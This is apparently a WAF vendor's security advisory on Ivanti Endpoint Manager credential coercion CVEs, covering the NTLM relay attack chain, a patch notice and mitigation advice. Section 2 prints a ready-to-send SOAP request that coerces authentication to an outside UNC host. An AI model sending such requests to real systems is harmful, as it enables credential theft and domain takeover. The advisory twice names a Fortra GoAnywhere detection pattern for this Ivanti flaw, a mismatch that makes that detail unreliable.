This vulnerability is a credential coercion vulnerability in Ivanti Endpoint Manager.
An attacker can attempt to obtain credentials and ultimately take over a domain by sending
SOAP XML data containing a remote UNC address accessible to the attacker's server to /WSVulnerabilityCore/VulCore.asmx.
A security patch for this vulnerability was released in January 2025, and AIWAF products will address this vulnerability
through the "2289 / Fortra GoAnywhere MFT Authentication Bypass (1)" pattern, which will be added in the February 2026 pattern update.
1. Overview
Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that provides integrated management of all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment.
This report summarizes the analysis of vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 that occurred in this solution.
Source : https://thehackernews.com/2024/10/ivanti-endpoint-manager-flaw-actively.html
2. Attack type
CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are credential coercion vulnerabilities that were registered in the NVD in January 2025. After these vulnerabilities were reported, horizon3.ai released a detailed analysis of them.
These vulnerabilities allow an attacker to manipulate an absolute path-based path traversal flaw to send a crafted UNC path,
causing Ivanti EPM to access an attacker-controlled SMB server located at that path, leading to credential theft.
An attacker can exploit this vulnerability by sending SOAP XML data containing a remote UNC address accessible to the attacker’s server
to the vulnerable endpoint /WSVulnerabilityCore/VulCore.asmx. When Ivanti EPM attempts to authenticate to the attacker’s SMB server,
the attacker can capture the NTLMv2 credentials and relay them to an LDAP server to create a privileged machine account,
enabling privilege escalation and potential domain takeover.
This issue occurs within the GetHashForFile, GetHashForSingleFile, GetHashForWildcard, and GetHashForWildcardRecursive functions
in the VulCore class, with separate CVE identifiers assigned for each function.
Example attack request:
POST /WSVulnerabilityCore/VulCore.asmx HTTP/1.1
Content-Length: 426
Content-Type: application/xml; charset=utf-8
Host: vulnerable.site.com
Soapaction: http://tempuri.org/GetHashForWildcardRecursive
User-Agent: HTTPie
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetHashForWildcardRecursive xmlns="http://tempuri.org/">
<wildcard>\\\\test.com\\tmp\\file1.txt</wildcard>
</GetHashForWildcardRecursive>
</soap:Body>
</soap:Envelope>
3. Response
Since Ivanti included a security patch for this vulnerability in the January 2025 security update, customers using this solution can mitigate the issue by applying that patch.
In our AIWAF, this vulnerability will be addressed through the “2289 / Fortra GoAnywhere MFT Authentication Bypass (1)”
pattern, which will be added in the February 2026 pattern update.
Source : https://hub.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6
4. Conclusion
Ivanti Endpoint Manager (EPM) is an IT asset and security management solution that integrates the management of all endpoints within an enterprise, including PCs, mobile devices, and IoT equipment. The vulnerabilities identified
as CVE-2024-10811, CVE-2024-13161, CVE-2024-13160, and CVE-2024-13159 are considered highly exploitable, as detailed
attack methods have been disclosed and the level of technical difficulty required to exploit them is relatively low.
Therefore, customers using this solution are strongly advised to promptly apply the relevant security patches.
Our TA team continues to monitor vulnerabilities discovered in Ivanti products and will respond quickly to any newly identified issues in the future.